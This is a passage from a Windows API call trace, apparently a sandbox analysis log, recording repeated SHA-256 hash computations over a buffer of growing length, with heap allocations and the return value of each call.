(HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e84810 [0186.592] CryptGetHashParam (in: hHash=0x3396efd0, dwParam=0x2, pbData=0x32e84810, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e84810, pdwDataLen=0xcdf6c) returned 1 [0186.592] CryptDestroyHash (hHash=0x3396efd0) returned 1 [0186.592] CryptReleaseContext (hProv=0x338235d0, dwFlags=0x0) returned 1 [0186.592] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338233d0) returned 1 [0186.593] CryptCreateHash (in: hProv=0x338233d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.593] CryptHashData (hHash=0x3396f900, pbData=0x32348160, dwDataLen=0xa0, dwFlags=0x0) returned 1 [0186.593] CryptGetHashParam (in: hHash=0x3396f900, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0186.593] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e84f00 [0186.593] CryptGetHashParam (in: hHash=0x3396f900, dwParam=0x2, pbData=0x32e84f00, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e84f00, pdwDataLen=0xcdf6c) returned 1 [0186.593] CryptDestroyHash (hHash=0x3396f900) returned 1 [0186.593] CryptReleaseContext (hProv=0x338233d0, dwFlags=0x0) returned 1 [0186.593] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338227d0) returned 1 [0186.593] CryptCreateHash (in: hProv=0x338227d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.593] CryptHashData (hHash=0x3396ea20, pbData=0x32348160, dwDataLen=0xc0, dwFlags=0x0) returned 1 [0186.594] CryptGetHashParam (in: hHash=0x3396ea20, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0186.594] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e84960 [0186.594] CryptGetHashParam (in: hHash=0x3396ea20, dwParam=0x2, pbData=0x32e84960, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e84960, pdwDataLen=0xcdf6c) returned 1 [0186.594] CryptDestroyHash (hHash=0x3396ea20) returned 1 [0186.594] CryptReleaseContext (hProv=0x338227d0, dwFlags=0x0) returned 1 [0186.594] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338234d0) returned 1 [0186.594] CryptCreateHash (in: hProv=0x338234d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.594] CryptHashData (hHash=0x3396f430, pbData=0x32348160, dwDataLen=0xe0, dwFlags=0x0) returned 1 [0186.594] CryptGetHashParam (in: hHash=0x3396f430, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0186.594] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e84780 [0186.594] CryptGetHashParam (in: hHash=0x3396f430, dwParam=0x2, pbData=0x32e84780, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e84780, pdwDataLen=0xcdf6c) returned 1 [0186.594] CryptDestroyHash (hHash=0x3396f430) returned 1 [0186.594] CryptReleaseContext (hProv=0x338234d0, dwFlags=0x0) returned 1 [0186.594] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33823bd0) returned 1 [0186.595] CryptCreateHash (in: hProv=0x33823bd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.595] CryptHashData (hHash=0x3396f890, pbData=0x32348160, dwDataLen=0x100, dwFlags=0x0) returned 1 [0186.595] CryptGetHashParam (in: hHash=0x3396f890, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0186.595] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e848d0 [0186.595] CryptGetHashParam (in: hHash=0x3396f890, dwParam=0x2, pbData=0x32e848d0, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e848d0, pdwDataLen=0xcdf6c) returned 1 [0186.595] CryptDestroyHash (hHash=0x3396f890) returned 1 [0186.595] CryptReleaseContext (hProv=0x33823bd0, dwFlags=0x0) returned 1 [0186.595] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33823bd0) returned 1 [0186.596] CryptCreateHash (in: hProv=0x33823bd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.596] CryptHashData (hHash=0x3396f7b0, pbData=0x32348160, dwDataLen=0x120, dwFlags=0x0) returned 1 [0186.596] CryptGetHashParam (in: hHash=0x3396f7b0, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0186.596] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e849f0 [0186.596] CryptGetHashParam (in: hHash=0x3396f7b0, dwParam=0x2, pbData=0x32e849f0, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e849f0, pdwDataLen=0xcdf6c) returned 1 [0186.596] CryptDestroyHash (hHash=0x3396f7b0) returned 1 [0186.596] CryptReleaseContext (hProv=0x33823bd0, dwFlags=0x0) returned 1 [0186.596] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338235d0) returned 1 [0186.596] CryptCreateHash (in: hProv=0x338235d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.596] CryptHashData (hHash=0x3396f5f0, pbData=0x32348160, dwDataLen=0x140, dwFlags=0x0) returned 1 [0186.596] CryptGetHashParam (in: hHash=0x3396f5f0, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0186.596] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e84c00 [0186.596] CryptGetHashParam (in: hHash=0x3396f5f0, dwParam=0x2, pbData=0x32e84c00, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e84c00, pdwDataLen=0xcdf6c) returned 1 [0186.596] CryptDestroyHash (hHash=0x3396f5f0) returned 1 [0186.596] CryptReleaseContext (hProv=0x338235d0, dwFlags=0x0) returned 1 [0186.596] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338230d0) returned 1 [0186.597] CryptCreateHash (in: hProv=0x338230d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.597] CryptHashData (hHash=0x3396ef60, pbData=0x32348160, dwDataLen=0x160, dwFlags=0x0) returned 1 [0186.597] CryptGetHashParam (in: hHash=0x3396ef60, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0186.597] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e84f30 [0186.597] CryptGetHashParam (in: hHash=0x3396ef60, dwParam=0x2, pbData=0x32e84f30, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e84f30, pdwDataLen=0xcdf6c) returned 1 [0186.597] CryptDestroyHash (hHash=0x3396ef60) returned 1 [0186.597] CryptReleaseContext (hProv=0x338230d0, dwFlags=0x0) returned 1 [0186.597] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33822ad0) returned 1 [0186.598] CryptCreateHash (in: hProv=0x33822ad0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.598] CryptHashData (hHash=0x3396f890, pbData=0x32348160, dwDataLen=0x180, dwFlags=0x0) returned 1 [0186.598] CryptGetHashParam (in: hHash=0x3396f890, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0186.598] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e850e0 [0186.598] CryptGetHashParam (in: hHash=0x3396f890, dwParam=0x2, pbData=0x32e850e0, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e850e0, pdwDataLen=0xcdf6c) returned 1 [0186.598] CryptDestroyHash (hHash=0x3396f890) returned 1 [0186.598] CryptReleaseContext (hProv=0x33822ad0, dwFlags=0x0) returned 1 [0186.598] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338238d0) returned 1 [0186.598] CryptCreateHash (in: hProv=0x338238d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.598] CryptHashData (hHash=0x3396ea20, pbData=0x32348160, dwDataLen=0x1a0, dwFlags=0x0) returned 1 [0186.598] CryptGetHashParam (in: hHash=0x3396ea20, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0186.599] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e84c90 [0186.599] CryptGetHashParam (in: hHash=0x3396ea20, dwParam=0x2, pbData=0x32e84c90, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e84c90, pdwDataLen=0xcdf6c) returned 1 [0186.599] CryptDestroyHash (hHash=0x3396ea20) returned 1 [0186.599] CryptReleaseContext (hProv=0x338238d0, dwFlags=0x0) returned 1 [0186.599] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338220d0) returned 1 [0186.599] CryptCreateHash (in: hProv=0x338220d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.599] CryptHashData (hHash=0x3396efd0, pbData=0x32348160, dwDataLen=0x1c0, dwFlags=0x0) returned 1 [0186.599] CryptGetHashParam (in: hHash=0x3396efd0, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0186.599] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e85230 [0186.599] CryptGetHashParam (in: hHash=0x3396efd0, dwParam=0x2, pbData=0x32e85230, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e85230, pdwDataLen=0xcdf6c) returned 1 [0186.599] CryptDestroyHash (hHash=0x3396efd0) returned 1 [0186.599] CryptReleaseContext (hProv=0x338220d0, dwFlags=0x0) returned 1 [0186.599] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338225d0) returned 1 [0186.600] CryptCreateHash (in: hProv=0x338225d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.600] CryptHashData (hHash=0x3396f890, pbData=0x32348160, dwDataLen=0x1e0, dwFlags=0x0) returned 1 [0186.600] CryptGetHashParam (in: hHash=0x3396f890, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0186.600] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e84840 [0186.600] CryptGetHashParam (in: hHash=0x3396f890, dwParam=0x2, pbData=0x32e84840, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e84840, pdwDataLen=0xcdf6c) returned 1 [0186.600] CryptDestroyHash (hHash=0x3396f890) returned 1 [0186.600] CryptReleaseContext (hProv=0x338225d0, dwFlags=0x0) returned 1 [0186.600] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338231d0) returned 1 [0186.601] CryptCreateHash (in: hProv=0x338231d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.601] CryptHashData (hHash=0x3396f5f0, pbData=0x32348160, dwDataLen=0x200, dwFlags=0x0) returned 1 [0186.601] CryptGetHashParam (in: hHash=0x3396f5f0, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0186.601] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e84fc0 [0186.601] CryptGetHashParam (in: hHash=0x3396f5f0, dwParam=0x2, pbData=0x32e84fc0, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e84fc0, pdwDataLen=0xcdf6c) returned 1 [0186.601] CryptDestroyHash (hHash=0x3396f5f0) returned 1 [0186.601] CryptReleaseContext (hProv=0x338231d0, dwFlags=0x0) returned 1 [0186.601] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33822ad0) returned 1 [0186.601] CryptCreateHash (in: hProv=0x33822ad0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.601] CryptHashData (hHash=0x3396f510, pbData=0x32348160, dwDataLen=0x220, dwFlags=0x0) returned 1 [0186.601] CryptGetHashParam (in: hHash=0x3396f510, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0186.601] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e84cc0 [0186.601] CryptGetHashParam (in: hHash=0x3396f510, dwParam=0x2, pbData=0x32e84cc0, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e84cc0, pdwDataLen=0xcdf6c) returned 1 [0186.601] CryptDestroyHash (hHash=0x3396f510) returned 1 [0186.601] CryptReleaseContext (hProv=0x33822ad0, dwFlags=0x0) returned 1 [0186.601] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338230d0) returned 1 [0186.602] CryptCreateHash (in: hProv=0x338230d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.602] CryptHashData (hHash=0x3396eef0, pbData=0x32348160, dwDataLen=0x240, dwFlags=0x0) returned 1 [0186.602] CryptGetHashParam (in: hHash=0x3396eef0, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0186.602] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e84b40 [0186.602] CryptGetHashParam (in: hHash=0x3396eef0, dwParam=0x2, pbData=0x32e84b40, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e84b40, pdwDataLen=0xcdf6c) returned 1 [0186.602] CryptDestroyHash (hHash=0x3396eef0) returned 1 [0186.602] CryptReleaseContext (hProv=0x338230d0, dwFlags=0x0) returned 1 [0186.602] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338236d0) returned 1 [0186.602] CryptCreateHash (in: hProv=0x338236d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.603] CryptHashData (hHash=0x3396f5f0, pbData=0x32348160, dwDataLen=0x260, dwFlags=0x0) returned 1 [0186.603] CryptGetHashParam (in: hHash=0x3396f5f0, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0186.603] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e84f60 [0186.603] CryptGetHashParam (in: hHash=0x3396f5f0, dwParam=0x2, pbData=0x32e84f60, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e84f60, pdwDataLen=0xcdf6c) returned 1 [0186.603] CryptDestroyHash (hHash=0x3396f5f0) returned 1 [0186.603] CryptReleaseContext (hProv=0x338236d0, dwFlags=0x0) returned 1 [0186.605] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33822dd0) returned 1 [0186.605] CryptCreateHash (in: hProv=0x33822dd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.605] CryptHashData (hHash=0x3396efd0, pbData=0x32348160, dwDataLen=0x280, dwFlags=0x0) returned 1 [0186.605] CryptGetHashParam (in: hHash=0x3396efd0, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0186.605] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e84870 [0186.606] CryptGetHashParam (in: hHash=0x3396efd0, dwParam=0x2, pbData=0x32e84870, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e84870, pdwDataLen=0xcdf6c) returned 1 [0186.606] CryptDestroyHash (hHash=0x3396efd0) returned 1 [0186.606] CryptReleaseContext (hProv=0x33822dd0, dwFlags=0x0) returned 1 [0186.606] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338231d0) returned 1 [0186.606] CryptCreateHash (in: hProv=0x338231d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.606] CryptHashData (hHash=0x3396ebe0, pbData=0x32348160, dwDataLen=0x2a0, dwFlags=0x0) returned 1 [0186.606] CryptGetHashParam (in: hHash=0x3396ebe0, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0186.606] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e84ab0 [0186.606] CryptGetHashParam (in: hHash=0x3396ebe0, dwParam=0x2, pbData=0x32e84ab0, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e84ab0, pdwDataLen=0xcdf6c) returned 1 [0186.606] CryptDestroyHash (hHash=0x3396ebe0) returned 1 [0186.606] CryptReleaseContext (hProv=0x338231d0, dwFlags=0x0) returned 1 [0186.606] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33822bd0) returned 1 [0186.607] CryptCreateHash (in: hProv=0x33822bd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.607] CryptHashData (hHash=0x3396f6d0, pbData=0x32348160, dwDataLen=0x2c0, dwFlags=0x0) returned 1 [0186.607] CryptGetHashParam (in: hHash=0x3396f6d0, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0186.607] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e84900 [0186.607] CryptGetHashParam (in: hHash=0x3396f6d0, dwParam=0x2, pbData=0x32e84900, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e84900, pdwDataLen=0xcdf6c) returned 1 [0186.607] CryptDestroyHash (hHash=0x3396f6d0) returned 1 [0186.607] CryptReleaseContext (hProv=0x33822bd0, dwFlags=0x0) returned 1 [0186.607] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338234d0) returned 1 [0186.608] CryptCreateHash (in: hProv=0x338234d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.608] CryptHashData (hHash=0x3396f430, pbData=0x32348160, dwDataLen=0x2e0, dwFlags=0x0) returned 1 [0186.608] CryptGetHashParam (in: hHash=0x3396f430, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0186.608] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e85290 [0186.608] CryptGetHashParam (in: hHash=0x3396f430, dwParam=0x2, pbData=0x32e85290, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e85290, pdwDataLen=0xcdf6c) returned 1 [0186.608] CryptDestroyHash (hHash=0x3396f430) returned 1 [0186.608] CryptReleaseContext (hProv=0x338234d0, dwFlags=0x0) returned 1 [0186.608] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338235d0) returned 1 [0186.608] CryptCreateHash (in: hProv=0x338235d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.608] CryptHashData (hHash=0x3396f5f0, pbData=0x32348160, dwDataLen=0x300, dwFlags=0x0) returned 1 [0186.608] CryptGetHashParam (in: hHash=0x3396f5f0, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0186.608] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e85050 [0186.608] CryptGetHashParam (in: hHash=0x3396f5f0, dwParam=0x2, pbData=0x32e85050, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e85050, pdwDataLen=0xcdf6c) returned 1 [0186.608] CryptDestroyHash (hHash=0x3396f5f0) returned 1 [0186.609] CryptReleaseContext (hProv=0x338235d0, dwFlags=0x0) returned 1 [0186.609] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33822cd0) returned 1 [0186.609] CryptCreateHash (in: hProv=0x33822cd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.609] CryptHashData (hHash=0x3396eda0, pbData=0x32348160, dwDataLen=0x320, dwFlags=0x0) returned 1 [0186.609] CryptGetHashParam (in: hHash=0x3396eda0, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0186.609] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e85080 [0186.609] CryptGetHashParam (in: hHash=0x3396eda0, dwParam=0x2, pbData=0x32e85080, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e85080, pdwDataLen=0xcdf6c) returned 1 [0186.609] CryptDestroyHash (hHash=0x3396eda0) returned 1 [0186.609] CryptReleaseContext (hProv=0x33822cd0, dwFlags=0x0) returned 1 [0186.609] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33821ed0) returned 1 [0186.610] CryptCreateHash (in: hProv=0x33821ed0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.610] CryptHashData (hHash=0x3396ebe0, pbData=0x32348160, dwDataLen=0x340, dwFlags=0x0) returned 1 [0186.610] CryptGetHashParam (in: hHash=0x3396ebe0, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0186.610] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e84930 [0186.610] CryptGetHashParam (in: hHash=0x3396ebe0, dwParam=0x2, pbData=0x32e84930, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e84930, pdwDataLen=0xcdf6c) returned 1 [0186.610] CryptDestroyHash (hHash=0x3396ebe0) returned 1 [0186.610] CryptReleaseContext (hProv=0x33821ed0, dwFlags=0x0) returned 1 [0186.610] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338225d0) returned 1 [0186.611] CryptCreateHash (in: hProv=0x338225d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.611] CryptHashData (hHash=0x3396ed30, pbData=0x32348160, dwDataLen=0x360, dwFlags=0x0) returned 1 [0186.611] CryptGetHashParam (in: hHash=0x3396ed30, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0186.611] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e84d80 [0186.611] CryptGetHashParam (in: hHash=0x3396ed30, dwParam=0x2, pbData=0x32e84d80, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e84d80, pdwDataLen=0xcdf6c) returned 1 [0186.611] CryptDestroyHash (hHash=0x3396ed30) returned 1 [0186.611] CryptReleaseContext (hProv=0x338225d0, dwFlags=0x0) returned 1 [0186.611] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33822bd0) returned 1 [0186.611] CryptCreateHash (in: hProv=0x33822bd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.611] CryptHashData (hHash=0x3396f660, pbData=0x32348160, dwDataLen=0x380, dwFlags=0x0) returned 1 [0186.611] CryptGetHashParam (in: hHash=0x3396f660, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0186.611] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e846c0 [0186.611] CryptGetHashParam (in: hHash=0x3396f660, dwParam=0x2, pbData=0x32e846c0, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e846c0, pdwDataLen=0xcdf6c) returned 1 [0186.612] CryptDestroyHash (hHash=0x3396f660) returned 1 [0186.612] CryptReleaseContext (hProv=0x33822bd0, dwFlags=0x0) returned 1 [0186.612] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338239d0) returned 1 [0186.612] CryptCreateHash (in: hProv=0x338239d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.612] CryptHashData (hHash=0x3396ed30, pbData=0x32348160, dwDataLen=0x3a0, dwFlags=0x0) returned 1 [0186.612] CryptGetHashParam (in: hHash=0x3396ed30, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: 